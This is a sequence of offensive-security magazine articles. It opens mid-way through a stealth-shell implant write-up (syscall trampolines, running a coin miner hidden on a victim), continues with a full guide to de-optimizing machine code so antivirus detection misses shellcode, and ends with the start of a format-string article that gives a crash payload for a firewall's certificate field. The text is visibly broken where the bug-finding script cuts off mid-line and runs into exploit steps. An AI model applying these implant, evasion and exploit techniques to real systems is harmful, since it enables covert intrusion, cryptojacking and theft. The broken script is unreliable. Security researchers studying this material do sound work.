xmrig binary on the target so we can convert the victim's computational
resources into coins. texec first resolves and maps the main binary into
local memory, then pokes it into remote memory by calling mmap or
VirtualAllocEx again. If the main binary requires an ELF interpreter,
as most do, texec maps the interpreter into memory, too.
Once texec loads our binaries in local memory and in the remote implant,
it just-in-time analyzes the local copy of the binaries' .text sections
for syscall instructions. x86_64 systems represent syscall instructions
with the two-byte "0f 05" sequence. For each syscall instruction texec
encounters, it prepares a detours-style patch by analyzing the
nearby instructions and relocating enough of them to insert
a jmp (e8 xx xx xx xx) instruction.
texec replaces (i.e. "patches") each relocated syscall instruction with a
jump to a trampoline containing:
1. relocated instructions from before the original syscall instruction
2. instructions that spill and restore the syscall arguments
3. a call into the runtime texec mapped earlier
4. any relocated instructions from after the original syscall instruction
5. and a jump back to the original instruction sequence.
Here's the stencil for the trampoline:
```
# relocated prefix instructions
{relocated_prefix}
# save syscall number
mov %rax, %r11
# save flags
lahf
seto %al
# skip red zone
sub $128, %rsp
# spill registers to stack
push %rax
push %r9
push %r8
push %r10
push %rdx
push %rsi
push %rdi
push %r11
# move address of spilled registers into first arg
mov %rsp, %rdi
# call the runtime's syscall handler
movabs ${runtime handler address}, %rcx
call *%rcx
# restore registers from stack
pop %rcx
pop %rdi
pop %rsi
pop %rdx
pop %r10
pop %r8
pop %r9
pop %rax
# restore previous stack
add $128, %rsp
# restore flags
add $0xff, %al
sahf
# move result into rax
mov %rcx, %rax
# relocated suffix instructions
{relocated_suffix}
# resume patched function
jmp {resume_address}
```
Once texec prepares all the patches for the program's syscall
instructions, it remotely pokes each patch into place via the implant.
It also must correct each segment's memory protection so the victim's
system will allow the instructions to execute on the victim's CPU; for
the parts of the picoprocess that contain instructions, texec marks them
as executable.
With that final step of poking patches into memory (and ensuring the
patched instructions can execute), we've tampered with the binary,
replacing its syscall instructions with jumps to trampolines. But we still
need to launch the picoprocess to achieve the dream of running a Linux
program inside the implant.
For these last few steps before the picoprocess launches, texec constructs
a main thread stack for the picoprocess by commanding the implant call
mmap or CreateThread.
To match what the Linux kernel would do when executing a new program,
the stack needs a description of the arguments and environment variables
to launch the picoprocess with. This data's format is called a System V
auxiliary vector. texec crafts a SysV auxiliary vector mimicking what a
real Linux kernel would produce when executing a program, and pokes
the vector into the remote stack it just created.
The last step before launch has texec command the implant to perform a
clone syscall or call ResumeThread to start executing the remotely loaded
program. The picoprocess now runs in the implant as an embedded thread.
Anyone examining the target system in ps, top, or Task Manager would only
see an additional thread on the existing process – no suspicious
subprocesses, binaries on disk, or program names. texec then waits for
commands from the remote picoprocess (running on the victim's machine),
just as the implant awaits our local commands.
Meanwhile, the picoprocess runs inside of the implant as a dedicated
thread, executing until it reaches its first patched (i.e. replaced)
syscall instruction. Remember, we tampered with the syscall instructions
so the picoprocess jumps to texec's handler instead. This means that,
instead of attempting a syscall, the picoprocess jumps to the designated
trampoline and calls the runtime's syscall handler to process what would
have been a syscall operation. The runtime determines whether to emulate
the program's syscall request locally or perform it remotely (on our
machine) by serializing the syscall's arguments, then sends the serialized
syscall across the network to the texec process waiting on our machine –
similar to what axon performs in the other direction.
The runtime's message wakes the texec running on our machine (it rests
in an idle state while awaiting our signal to perform some remote
operations). texec accepts the runtime's serialized bytes, reads our
command into a local buffer, and performs the runtime's requested
syscall. When the syscall completes, the texec serializes the result –
including any mutated data – into a network representation. It then sends
this serialized representation back over the network as a response to the
runtime before waiting for further commands to perform.
Upon receipt, the runtime first deserializes the response into its
constituent components; for example, a response to a read request will
include the status of the read syscall, as well as whatever bytes
the implant read. Then the runtime writes any updated data into the
picoprocess's address space and returns into the trampoline to resume the
picoprocess, awaiting its additional commands (i.e. syscall requests).
This may sound familiar — it's the exact series of events as earlier
when we discussed axon, but reversing the direction of traffic across the
network socket.
Now that texec can load programs remotely and process their syscall
requests, we can run programs and access either side's data on both
"hemispheres" of our unified distributed system. With the implant + axon +
texec + texec's runtime, we can access our local and our victim's remote
resources and command them as we please. We have one distributed system
spread across a network, hidden from the victim system's operator.
Multi-platform support
~~~~~~~~~~~~~~~~~~~~~~
We've definitely skimmed over multi-OS support as if it were trivial until
this point. As foreshadowed, we must translate Linux syscalls into the
remote system's OS interface if we want to target multiple operating
systems. Executives don't seem to care about hacks unless they're on a
machine they use – which is almost always Windows – so our tooling doesn't
suffice until we support the big three.
What do we need to support each major OS?
Linux targets are straightforward: the target shares the same syscall
interface, though potentially an older version with fewer features.
Enterprises tend to run older LTS systems. The only hazard we face is
copying input and output data correctly.
macOS targets have many syscalls similar to Linux, albeit with different
numeric IDs and calling conventions. Some Linux syscalls, however, have
different data layouts in their macOS equivalent or are simply
unavailable. To remotely perform a macOS syscall, a stealth shell must
translate between the two ABIs.
For Windows targets, the entire API is different; the design distinctly
differs from UNIX operating systems. CreateFileEx is similar to open,
and the HANDLEs it produces can be thought of as file descriptors by
another name, but all the other syscalls stymie direct translation.
If you want to extend stealth shell support to Windows targets, be
prepared to invest heavily into your Windows translation layer. It took
a hundred or so hours as a humble software engineer, so surely your leet
attack team can build it without sacrificing their sanity in the pursuit
of perfection. Perhaps read cygwin for inspiration.
Conclusion
~~~~~~~~~~
Stealth shells make remote interactive shells even more flexible while
remaining as perniciously sneaky as custom in-memory exploits. There is
no tradeoff: we can be both quiet and nimble. It extends the practice of
syscall remoting so we can enjoy the comfort and familiarity of the Linux
ecosystem while maximizing pwnage possibilities on target systems,
regardless of OS.
Our stealth shell uses an implant and two interrelated syscall
dispatchers – axon and texec – to interrupt syscalls and redirect them
for execution on the appropriate resource (either the victim's machine or
our own). axon coordinates and dispatches the syscall activity of a tree
of subprocesses, bridging two systems together into one interactive
environment and minimizing side effects on the victim's system. texec
instantiates and coordinates the activity of a remote picoprocess,
converting regular Linux programs into spooky execution at a distance.
Stealth shells are just as cloaked to defenders as vastly more cumbersome
custom in-memory exploits (and are certainly as sneaky as prior syscall
remoting approaches). If a hyperfocused SRE can detect an in-memory
implant, they can detect stealth shell's in-memory implant. If they can
detect an in-memory implant loading new/more code, they can detect texec
loading a picoprocess.
With that said, we can layer a stealth shell with other evasive
techniques – such as tunneling through DNS, reusing an existing socket,
and, with additional effort, mimicking an existing protocol like HTTP.
We will leave that as an exercise for the reader.
Exploits get most of the hype, but toolchains and workflows are what make
or break real attack operations. Plus, we deserve civilized workflows that
don't require us to cosplay as Windows sysadmin. I hope this inspires other
obsessive systems nerds to brainstorm what other tools need a refresh to
ferry them into the modern ops era.
~~~~~~~~~~~~~~~~
Greetz and the deepest thanks to &void; who pushed me to publish this
paper and employed their writing wizardry to make it readable.
==================================================
==Phrack Inc.==
Volume 0x10, Issue 0x47, Phile #0x0F of 0x11
|=-----------------------------------------------------------------------=|
|=------------------=[ Evasion by De-optimization ]=---------------------=|
|=-----------------------------------------------------------------------=|
|=---------------------------=[ Ege BALCI ]=-----------------------------=|
|=-----------------------------------------------------------------------=|
--[ Table of Contents
1 - Intro
2 - Current A.V. Evasion Challenges
3 - Prior Work
4 - Transforming Machine Code
5 - Transform Gadgets
5.1 - Arithmetic Partitioning
5.2 - Logical Inverse
5.3 - Logical Partitioning
5.4 - Offset Mutation
5.5 - Register Swapping
6 - Address Realignments
7 - Known Limitations
8 - Conclusion
9 - References
--[ 1 - Intro
Bypassing security products is a very important part of many offensive
security engagements. The majority of the current AV evasion techniques
used in various evasion tools, such as packers, encoders, and obfuscators,
are heavily dependent on the use of self-modifying code running on RWE
memory regions. Considering the current state of security products, such
evasion attempts are easily detected by memory analysis tools such as
Moneta[1] and Pe-sieve[2]. This study introduces a new approach to code
obfuscation with the use of machine code de-optimization.
In this study, we will delve into how we can use certain mathematical
approaches, such as arithmetic partitioning, logical inverse, polynomial
transformation, and logical partitioning, to design a generic formula
that can be applied to many machine code instructions for transforming /
mutating or de-optimizing the bytes of the target program without
creating any recognizable patterns. Another objective of this study is
to give a step-by-step guide for implementing a machine code de-optimizer
tool that uses these methods to bypass pattern-based detection.
Such tools have already been implemented, and will be shared[3] as an
open-source project with references to this article.
--[ 2 - Current A.V. Evasion Challenges
The term "security product" represents a wide variety of software
nowadays. The inner workings of such software may differ, but the main
purpose is always to detect some type of malicious asset by recognizing
certain patterns. Such indicators can originate from a piece of code,
data, a behavior log, or even from the entropy of the program. The main
goal of this study is to introduce a new way of obfuscating malicious
code. So, we will only focus on evading malicious CODE patterns.
Arguably, the most popular way of hiding malicious code is by using
encoders. Encoding a piece of machine code can be considered the most
primitive way of eliminating malicious code patterns. Because of the
current security standards, most encoders are not very effective at
bypassing security products on their own. Instead, they're being used
in more complex evasion software such as packers, crypters, obfuscators,
command-and-control, and exploitation frameworks. Most encoders work by
encoding the malicious code by applying some arithmetic or logical
operations to the bytes. After such transformation, encoder software
needs to add a decoding routine at the beginning of the encoded payload
to fix the bytes before executing the actual malicious code.
+-----------+
| decoder | <--- Decodes the original payload.
+-----------+ +-----------+
| | | |
| malicious | | |
| code | ===> | enc-code |
| | | |
| | | |
+-----------+ +-----------+
There are three critical issues with this approach. The first issue is
the effectiveness of the encoding algorithm. If the malicious code is
being encoded by just a single byte of logical/arithmetic operation, the
security products can also detect the encoded form of the malicious
code.[4] In order to make the malicious code unrecognizable, the encoder
needs to use more complex encoding algorithms, such as primitive
cryptographic ciphers or at least multi-byte encoding schemes.
Naturally, such complex encoding algorithms require larger decoder
routines. This brings us to the second critical issue, which is the
visibility of the decoder routine. Most security products can easily
detect the existence of such code at the beginning of an encoded blob by
using static detection rules[5]. There are some new-generation encoder
software that tries to obfuscate and hide the decoder code by also
encoding the decoder routine, reducing its size, and obfuscating it
with garbage instructions.[6] Such designs produce promising results,
but it does not solve the final and most crucial issue.
In the end, all of the encoder software produces a piece of self-modifying
code. This means the resulting payload must be running inside a
Read-Write-Execute (RWE) memory region. Such a scenario can easily be
considered a suspicious indicator.
--[ 3 - Prior Work
To solve the aforementioned issues, security researchers created several
machine code obfuscators.[7][8] The purpose of these obfuscators is to
transform certain machine code instructions with certain rules for
bypassing security products without the need for self-modifying code.
These obfuscators analyze the instructions of the given binary and mutate
them to some other instruction(s). The following lines contain a simple
example. The original instruction loads the 0xDEAD value into the RCX
register;
lea rcx, [0xDEAD] ------+-> lea rcx, [1CE54]
+-> sub rcx, EFA7
The obfuscator program creates the above instruction sequence. After
executing two of the newly generated instructions, the resulting value
inside RCX will be the same. The assembled bytes of the newly generated
sequence are different enough to bypass static detection rules. But there
is one problem here. The final SUB instruction of the generated sequence
modifies the condition flags.
Depending on the code, this could affect the control flow of the program.
To avoid such conditions, these obfuscator programs also add save/restore
instructions to the generated sequence to preserve all the register values
including the condition flags. So, the final output of the program will be;
pushf ; --------------> Save condition flags to stack.
lea rcx, [1CE54]
sub rcx, EFA7
popf ; --------------> Restore condition flags from the stack.
If you analyze the final instruction sequence, you will realize that such
an order of instructions is very uncommon, and wouldn't be generated from
a compiler under normal circumstances. It means that this method of
obfuscating instructions can be detected by security products with static
detection rules for these techniques.
The following simple Yara rule can be used for detecting all the
sequences generated by the LEA transform gadget of the Alcatraz
binary obfuscator.
rule Alcatraz_LEA_Transform {
strings:
// pushf > 66 9c
// lea ?, [?] > 48 8d ?? ?? ?? ?? ??
// sub ?, ? > 48 81 ?? ?? ?? ?? ??
// popf > 66 9d
$lea_transform = { 66 9c 48 8d ?? ?? ?? ?? ?? 48 81 ?? ?? ?? ?? ?? 66 9d }
condition:
$lea_transform
}
This rule can easily be used by security products because it has a very
low false-positive rate due to the unusual order of the generated
instruction sequence. Another shortcoming of currently available machine
code obfuscators is using specific transform logic for specific
instructions. There are around 1503 instructions available for the
current Intel x86 instruction set. Designing specific transform gadgets
for each of these instructions can be considered challenging and
time-consuming. One of the main goals of this study is to create
math-based generic algorithms that can be applied to many instructions
at once.
--[ 4 - Transforming Machine Code
To effectively transform x86 machine code, we need a deep understanding
of x86 architecture and the instruction set. In the x86 architecture,
instructions can take up to five operands. We can divide the types of
operands into three main categories. An operand can either be a register,
immediate, or memory. These operand types have their subcategories, but
for the sake of simplicity, we can skip this for now.
Depending on the mnemonic, an x86 instruction can have all the
combinations of the mentioned operand types. As such, there are many ways
to transform x86 instructions. All the compiler toolchains do this all the
time during the optimization phase[9].
These optimizations can be as complex as reducing a long loop condition
to a brief branch operation or re-encoding a single instruction to a much
shorter sequence of bytes, effectively making the program smaller and
faster. The following example shows that there are multiple ways to encode
certain instructions in x86 architecture.
add al,10h --------------------> \x04\x10
add al,10h --------------------> \x80\xC0\x10
adc al,0DCh -------------------> \x14\xDC
adc al,0DCh -------------------> \x80\xD0\xDC
sub al,0A0h -------------------> \x2C\xA0
sub al,0A0h -------------------> \x80\xE8\xA0
sub eax,19930520h -------------> \x2D\x20\x05\x93\x19
sub eax,19930520h -------------> \x81\xE8\x20\x05\x93\x19
sbb al,0Ch --------------------> \x1C\x0C
sbb al,0Ch --------------------> \x80\xD8\x0C
sbb rax,221133h ---------------> \x48\x1D\x33\x11\x22\x00
sbb rax,221133h ---------------> \x48\x81\xD8\x33\x11\x22\x00
Each of the instruction pairs does the exact same thing, with different
corresponding bytes. This is usually done automatically by the compiler
toolchains. Unfortunately, this type of shortening can only be applied
to certain instructions. Also, once you analyze the produced bytes,
you'll see that only the beginning part (mnemonic code) of the bytes
are changing, the rest of the bytes representing the operand values are
exactly the same. This is not good in terms of detection, because most
detection rules focus on the operand values. These are the reasons why
we need to focus on more complex ways of de-optimization.
Most modern compiler toolchains such as LLVM, convert the code into
intermediate representations (IR) for applying complex optimizations.
IR languages make it very easy to manipulate the code and apply certain
simplifications independent from the target platform. At first glance,
using LLVM sounds very logical for achieving our objective in this study;
it already has various engines, libraries, and tooling built into the
framework for code manipulation. Unfortunately, this is not the case.
After getting into the endless rabbit hole of LLVM's inner workings, you
realize that IR-based optimizations are leaving behind certain patterns
in the code[10]. When the code is transformed into IR, whether from source
code or binary lifting[11], you lose control of individual instructions.
Because IR-based optimizations mainly focus on simplifying and shortening
well-structured functions instead of raw pieces of code, it makes it hard
to eradicate certain patterns. Maybe highly skilled LLVM wizards can hack
their way around these limitations, but we will go with manual disassembly
using the iced_x86[12] rust disassembly library in this study. It will
help us thoroughly analyze the binary code and give us enough control
over the individual instructions.
Since our primary objective is to evade security products, while
de-optimizing the instructions, we also need to be sure that the
generated instruction sequence is also commonly generated by regular
compiler toolchains. This way, our obfuscated code can blend in with
the benign code, and rule-based detection will not be possible against
our transform gadgets.
In order to determine how common the generated instructions are, we can
write specific Yara rules for our transform gadgets, and run the rules on
a large dataset. For this study, ~300 GB dataset consisting of executable
sections of various well-known benign EXE, ELF, SO, and DLL files has been
curated. We will simply run our Yara rules on this dataset and check the
false positive rate.
--[ 5 - Transform Gadgets
Now, we need a way of transforming individual instructions, while
maintaining the overall functionality of the program. In order to
achieve this, we will take advantage of basic math and numbers theory.
Most instructions in the x86 instruction set can be mapped to equivalent
mathematical operands. For example, the "ADD" instruction can be directly
translated to the addition operand "+". The following table shows various
translation examples:
MOV, PUSH, POP, LEA ---> =
CMP, SUB, SBB ---> -
ADD, ADC ---> +
IMUL, MUL ---> *
IDIV, DIV ---> /
TEST, AND ---> &
OR ---> |
XOR ---> ^
SHL ---> <<
SHR ---> >>
NOT ---> '
With this approach, we can easily represent basic x86 instructions as
mathematical equations. For example, "MOV EAX, 0x01" can be represented
as "x = 1". A bit more complex example could be;
MOV ECX,8 ) -------------> z = 8 )
SHL EAX,2 ) -------------> 4x )
SHL EBX,1 ) -------------> 2y ) ---> ((4x+2y+8)**2)
ADD EAX,EBX ) -------------> 4x+2y )
ADD EAX,ECX ) -------------> 4x+2y+8 )
IMUL EAX,EAX ) -------------> (4x+2y+8)^2 )
When dealing with code sequences that only contain operations of addition,
subtraction, multiplication, and positive-integer powers of variables,
formed expressions can be transformed using polynomial transformation
tricks. Similar "Data-flow optimization" tricks are being used by compiler
toolchains during code optimizations[9], but we can also leverage the same
principles for infinitely expanding the expressions. In the case of this
example, the above expression can be extended to:
(16x^2 + 16xy + 64x + 4y^2 + 32y + 64)
When this expression is transformed back into assembly code, you'll see
that multiple instructions are changed, new ones are added, and some
disappear. The only problem for us is that some instructions stay exactly
the same, which may still trigger detection. In order to prevent this, we
need to use other mathematical methods on a more individual level.
In the following sections, we'll analyze five different transform gadgets
that will be targeting specific instruction groups.
--[ 5.1 - Arithmetic Partitioning
Our first transform gadget will target all the arithmetic instructions
with an immediate type operand, such as MOV, ADD, SUB, PUSH, POP, etc.
Consider the following example; "ADD EAX, 0x10"
This simple ADD instruction can be considered the addition (+) operator
in the expression "X + 16". This expression can be infinitely extended
using the arithmetic partitioning method, such as:
(X + 16) = (X + 5 - 4 + 2 + 13)
When we encounter such instructions, we can simply randomize the
immediate value and add an extra instruction for fixing it. Based on
the randomly generated immediate value, we need to choose between the
original mnemonic, or the arithmetic inverse of it.
In order to keep the generated code under the radar, only one level of
partitioning (additional fix instruction) will suffice. Applying many
arithmetic operations to a single destination operand might create a
recognizable pattern. Here are some other examples:
mov edi,0C000008Eh ---+-> mov edi,0C738EE04h
+-> sub edi,738ED76h
add al,10h ------------+-> add al,0D8h
+-> sub al,0C8h
sub esi,0A0h ----------+-> sub esi,5062F20Ch
+-> add esi,5062F16Ch
push 0AABBh -----------+-> push 7F08C11Dh
+-> sub dword ptr [esp],7F081662h
Upon testing how frequent the generated code sequences are on our sample
dataset, we see that ~38% of the compiler-generated sections contain such
instruction sequences. This means that almost one of every three compiled
binary files contains these instructions, which makes it very hard to
distinguish.
--[ 5.2 - Logical Inverse
This transform gadget will target half of the logical operation
instructions with an immediate operand such as AND, OR, or XOR.
Consider the following example; "XOR R10, 0x10" This simple XOR
instruction can be written as "X ^ 16". This expression can be
transformed using the properties of the logical inverse, such as;
(X ^ 16) = (X' ^ '16) = (X' ^ -17)
Once we encounter such instructions, we can simply transform the
instructions by taking the inverse of the immediate value and adding
an additional NOT instruction for taking the inverse of the destination
operand. The same logic can also be applied to other logical operands.
"AND AL, 0x10" instructions can be expressed as "X & 16". Using the same
logical inverse trick, we can transform this expression into;
(X & 16) = (X' | 16') = (X' | -17)
For the case of AND and OR mnemonics, the destination operand needs to
be restored with an additional NOT instruction at the end. Here are some
other examples:
xor r10d,49656E69h ---+-> not r10d
+-> xor r10d,0B69A9196h
+-> not al
and al,1 --------------+-> or al,0FEh
+-> not al
+-> not edx
or edx,300h -----------+-> and edx,0FFFFFCFFh
+-> not edx
As mentioned earlier in this article, pattern-based detection rules
written for detecting malicious "code" mostly target the immediate
values on the instructions. So, using this simple logical inverse
trick will sufficiently mutate the immediate value without creating
any recognizable patterns.
After testing the frequency of the generated code sequence, we see
that ~%10 of the compiler-generated sections contain such instruction
sequences. This is high enough that any detection rule for this
specific transform won't be used by AV vendors due to the potential
for high false positives.
--[ 5.3 - Logical Partitioning
This transform gadget will target the remaining half of the logical
operation instructions with an immediate operand such as ROL, ROR,
SHL, or SHR. In the case of shift instructions, we can split the
shift operation into two parts.
Consider the following example; "SHL AL, 0x05".
This instruction can be split into "SHL AL, 0x2" and "SHL AL, 0x3". The
resulting AL value and the condition flags will always be the same. In
the case of roll instructions, there is a simpler way to mutate the
immediate value.
The destination operand of these logical operations is either a register,
or a memory with a defined size. Based on the destination operand size,
the roll immediate value can be changed accordingly.
Consider the following example: "ROL AL, 0x01"
This instruction will roll the bits of the AL register once to the left.
Since AL is an 8-bit register, the "ROL AL, 0x09" instruction will have
the exact same effect. Roll transforms are very effective for keeping the
mutated code size low since we don't need extra instructions.
Here are some other examples:
shr rbx,10h -------------+-> shr rbx,8
+-> shr rbx,8
shl qword ptr [ecx],20h -+-> shl qword ptr [ecx],10h
+-> shl qword ptr [ecx],10h
ror eax,0Ah ---------------> ror eax,4Ah
rol rcx,31h ---------------> rol rcx,0B1h
These transforms modify the condition flags the exact same way as the
original instruction, and thus can be used safely without any additional
save/restore instructions. Since the transformed code is very small,
writing an effective Yara rule becomes quite hard. After testing the
frequency of the generated code sequences, we see that ~%59 of the
compiler-generated sections contain such instruction sequences.
--[ 5.4 - Offset Mutation
This transform gadget will target all the instructions with a memory-type
operand. For a better understanding of the memory operand type, let's
deconstruct the memory addressing logic of the x86 instruction set.
Any instruction with a memory operand needs to define a memory location
represented inside square brackets. This form of representation may
contain base registers, segment prefix registers, positive and negative
offsets, and positive scale vectors. Consider the following instruction:
MOV CS:[EAX+0x100*8]
| | | |
+----+----+---+---> Segment Register
+----+---+---> Base Register
+---+---> Displacement Offset
+---> Scale Vector
A valid memory operand can contain any combination of these fields. If it
only contains a large (the same size as the bitness) displacement offset,
then it can be called an absolute address. Our Offset Mutation Transform
gadget will specifically target memory operands with a base register. We
will be using basic arithmetic partitioning tricks on the memory
displacement value of the operand.
The "MOV RAX, [RAX+0x10]" instruction moves 16 bytes from the [RAX+0x10]
memory location onto itself. Such move operations are very common because
of operations like referencing a pointer. For mutating the memory operand
values, we can simply manipulate the contents of the RAX register.
Adding a simple ADD/SUB instruction with RAX before the original
instruction will enable us to mutate the displacement offset.
Here are some examples:
mov rax,[rax] -------+-> add rax,705EBC8Dh
+-> mov rax,[rax-705EBC8Dh]
mov rax,[rax+10h] ---+-> sub rax,20DA86AAh
+-> mov rax,[rax+20DA86BAh]
lea rcx,[rcx] -------+-> add rcx,0D5F14ECh
+-> lea rcx,[rcx-0D5F14ECh]
In each of these example cases, the destination operand is the base
register inside the memory operand (pointer referencing). For the other
cases, we need additional instructions at the end for preserving the
base register contents. Here are some other examples:
+-> add rax,4F037035h
mov [rax],edi --------------+-> mov [rax-4F037035h],edi
+-> sub rax,4F037035h
+-> add rbx,34A92BDh
mov rcx,[rbx+28h] ----------+-> mov rcx,[rbx-34A9295h]
+-> sub rbx,34A92BDh
+-> sub rbp,2841821Ch
mov dword ptr [rbp+40h],1 --+-> mov dword ptr [rbp+2841825Ch],1
+-> add rbp,2841821Ch
The offset mutation transform can be applied to any instruction with a
memory operand. Unfortunately, this transform may affect the condition
flags.
In such a scenario, instead of adding extra save/restore instructions,
we can check if the manipulated condition flags are actually affecting
the control flow of the application by tracing the next instructions.
If the manipulated condition flags are being overwritten by another
instruction, we can safely use this transform. Due to the massive scope
of this transform gadget, it becomes quite hard to write an effective
Yara rule. We can easily consider the instruction mutated by this
transform to be common, and undetectable.
--[ 5.5 - Register Swapping
This transform gadget will target all the instructions with a register-
type operand, which can be considered a very large scope. This may be
the most basic but still effective transformation in our arsenal.
After the immediate and memory operand types, the register is the third
most common operand type that is being targeted by detection rules. Our
goal is to replace the register being used on an instruction with another,
same-sized register using the XCHG instruction.
Consider the "XOR RAX,0x10" instruction. We can change the RAX register
with any other 64-bit register by exchanging the value before and after
the original instruction. Here are some examples:
+-> xchg rax,rcx
xor rax,10h --------+-> xor rcx,10h
+-> xchg rax,rcx
+-> xchg rbx,rsi
and rbx,31h --------+-> and rsi,31h
+-> xchg rbx,rsi
+-> xchg rdx,rdi
mov rdx,rax --------+-> mov rdi,rax
+-> xchg rdx,rdi
This transform does not modify any of the condition flags, and can be
used safely without any additional save/restore instructions.
The generated sequence of instructions may seem uncommon, but due to the
scope of this transform and the small size of the exchange instructions,
the generated sequence of bytes is found to be very frequent in our sample
data set. After testing the frequency of the generated code sequences, we
see that ~92% of the compiler-generated sections contain such instruction
sequences.
--[ 6 - Address Realignments
After using any of these transform gadgets, an obvious outcome will be the
increased code size due to the additional number of instructions. This
will cause misalignments in the branch operations and relative memory
addresses. While de-optimizing each instruction, we need to be aware
of how much the original instruction size is increased so that we can
calculate a delta value for aligning each of the branch operations.
This may sound complex, simply because it is :) Handling such address
calculations is easy when you have the source code of the program. But
if you only have an already-compiled binary, address alignment becomes
a bit tricky. We will not dive into the line-by-line implementation of
post-de-optimization address realignment; the only thing to keep in mind
is double-checking branch instructions after the alignment.
There is a case where modified branch instructions (conditional jumps)
increase in size if they are modified to branch into much further
addresses. This specific issue causes a recursive misalignment and
requires a realignment after each fix on branch targets.
--[ 7 - Known Limitations
There are some known limitations while using these transform gadgets.
The first and most obvious one is the limited scope of supported
instruction types. There are some instruction types that cannot be
transformed with the mentioned gadgets. Instructions with no operands
are one of them. Such instructions are very hard to transform since
they do not have any operands to mutate. The only thing we can do is
relocate them somewhere else in the code.
This is not a very big problem because the frequency of unsupported
instructions is very low. In order to find out how frequently an
instruction is being generated by compilers, we can calculate frequency
statistics on our previously mentioned sample data set. The following
list contains the frequency statistics of each x86 instruction.
1. %33.5 MOV
2. %9.2 JCC (All conditional jumps)
3. %6.4 CALL
4. %5.5 LEA
5. %4.9 CMP
6. %3.9 ADD
7. %3.7 TEST
8. %3.5 JMP
9. %3.3 PUSH
10. %3.0 POP
11. %2.7 NOP
12. %2.2 XOR
13. %1.7 SUB
14. %1.5 INT3
15. %1.1 MOVZX
16. %1.0 AND
17. %1.O RET
18. %0.6 SHL
19. %0.5 OR
20. %0.5 SHR
- %11.3
Similar instruction frequency studies[13] on x86 instruction set have
been made on different samples, and it can be seen that the results are
very much parallel with the list above. The instruction frequency list
shows that only around 5% of the instructions are not supported by our
transform gadgets.
As can be seen on the list, the most commonly used instructions are
simple load/store, arithmetic, logic, and branch instructions. This
means that, if implemented properly, previously explained transform
gadgets are able to transform the ~%95 of the instructions of compiler-
generated programs.
This can be considered more than enough to bypass rule-based detection
mechanisms. Another known limitation is self-modifying code. If the code
is overwriting itself, our transform gadgets will probably break the code.
Some code may also be using branch instructions with dynamically
calculated branch targets, in such cases the address realignment becomes
impossible without using code emulation. Lucky for us, such code is not
very commonly produced by compiler toolchains. Another rare condition is
overlapping instructions. Under certain circumstances, compiler toolchains
generate instructions that can be executed differently when branched into
the middle of the instruction. Consider the following example:
0000: B8 00 03 C1 BB mov eax, 0xBBC10300
0005: B9 00 00 00 05 mov ecx, 0x05000000
000A: 03 C1 add eax, ecx
000C: EB F4 jmp $-10
000E: 03 C3 add eax, ebx
0010: C3 ret
The JMP instruction will land on the third byte of the five-byte MOV
instruction at address 0000. It will create a completely new instruction
stream with a new alignment. This situation is very hard to detect without
some code emulation.
Another thing to consider is code with data inside. This is also a very
rare condition, but in certain circumstances, code can contain strings of
data. The most common scenario for such a condition is string operations
in shellcodes. It is very hard to differentiate between code and data when
there are no structured file formats or code sections.
Under such circumstances, our de-optimizer tool may treat data as code and
corrupt it by trying to apply transforms; but this can be avoided to some
extent during disassembly. Instead of using linear sweep[14] disassembly,
control flow tracing with a depth-first search[14] approach can be used
to skip data bytes inside the code.
--[ 8 - Conclusion
In this article, we have underlined real-life evasion challenges commonly
encountered by security professionals, and introduced several alternative
ways for solving these challenges via de-optimizing individual X86
instructions. The known limitations of these methods are proven not to
be a critical obstacle to the objective of this study.
These de-optimization methods have been found to be highly effective for
eliminating any pattern in machine code. A POC de-optimizer tool[3] has
been developed during this study to test the effectiveness of these
de-optimization methods. The tests are conducted by de-optimizing all the
available Metasploit[15] shellcodes and checking the detection rates via
multiple memory-based scanners and online analysis platforms.
The test results show that using these de-optimization methods is proven
to be highly effective against pattern-based detection while avoiding the
use of self-modifying code (RWE memory use). Of course, as in every study
on evasion, the real results will emerge over time after the release of
this open-source POC tool.
--[ 9 - References
- [1] https://github.com/forrest-orr/moneta
- [2] https://github.com/hasherezade/pe-sieve
- [3] https://github.com/EgeBalci/deoptimizer
- [4] https://github.com/hasherezade/pe-sieve/blob/603ea39612d7eb81545734c63dd1b4e7a36fd729/params_info/pe_sieve_params_info.cpp#L179
- [5] https://www.mandiant.com/resources/blog/shikata-ga-nai-encoder-still-going-strong
- [6] https://github.com/EgeBalci/sgn
- [7] https://github.com/zeroSteiner/crimson-forge
- [8] https://github.com/weak1337/Alcatraz
- [9] https://en.wikipedia.org/wiki/Optimizing_compiler
- [10] https://monkbai.github.io/files/sp-22.pdf
- [11] https://github.com/lifting-bits/mcsema
- [12] https://docs.rs/iced-x86/latest/iced_x86/
- [13] https://www.strchr.com/x86_machine_code_statistics
- [14] http://infoscience.epfl.ch/record/167546/files/thesis.pdf
- [15] https://github.com/rapid7/metasploit-framework
|=[ EOF ]=---------------------------------------------------------------=|
==Phrack Inc.==
Volume 0x10, Issue 0x47, Phile #0x10 of 0x11
|=-----------------------------------------------------------------------=|
|=--------------------=[ Long Live Format Strings ]=---------------------=|
|=-----------------------------------------------------------------------=|
|=-------------------------=[ Mark Remarkable ]=-------------------------=|
|=-----------------------------------------------------------------------=|
0. Introduction
1. Finding Format String Bugs
2. Beating a Dead Firewall
---[ 0 - Introduction
Format string attacks should be dead. glibc's FORTIFY_SOURCE was released
nearly 20 years ago. It's enabled by default. Vulnerabilities are trivial
to detect with static source code analysis. You have to be actively trying
to make a vulnerable piece of software. And yet, despite the existence of
foolproof protections, we still see multi-billion dollar companies ship
code with obvious format string vulnerabilities.
This article will consist of a few lines of code and a few boring 0-day's,
just to keep the reader interested.
---[ 1 - Finding Format String Bugs
Most format strings are hardcoded, or at least come from a small set of
possible values. The exceptions to this pattern are what introduce format
string bugs. Modern reverse engineering tools make it incredibly easy to
filter format string function calls down to the 1% of exceptions. Although
there are better scripts out there, this simple Binary Ninja script was
good enough to find a few quick 0days
fns={
"printf":0,
"fprintf":1,
"dprintf":1,
"sprintf":1,
"snprintf":2,
"vprintf":0,
"vfprintf":1,
"vsprintf":1,
"vsnprintf":2,
}
def check(function,arg):
for caller in function.caller_sites:
try: inst=caller.mlil.ssa_form
except KeyboardInterrupt as e: return
except Exception: continue
if inst is None: continue
op=inst.operation
if op in (MediumLevelILOperation.MLIL_CALL_SSA,
MediumLevelILOperation.MLIL_CALL_UNTYPED_SSA,
MediumLevelILOperation.MLIL_TAILCALL_SSA):
if len(inst.params) Certificates -> Create/Import -> Certificate
-> Import Certificate -> Certificate
2. Add a valid certificate file and key file
3. Set the certificate name to %4919$1$c%n%n%n%n%n%n%n%n%n
4. Click create
Internal server error? Let's check the crash log.
# diagnose debug crashlog read
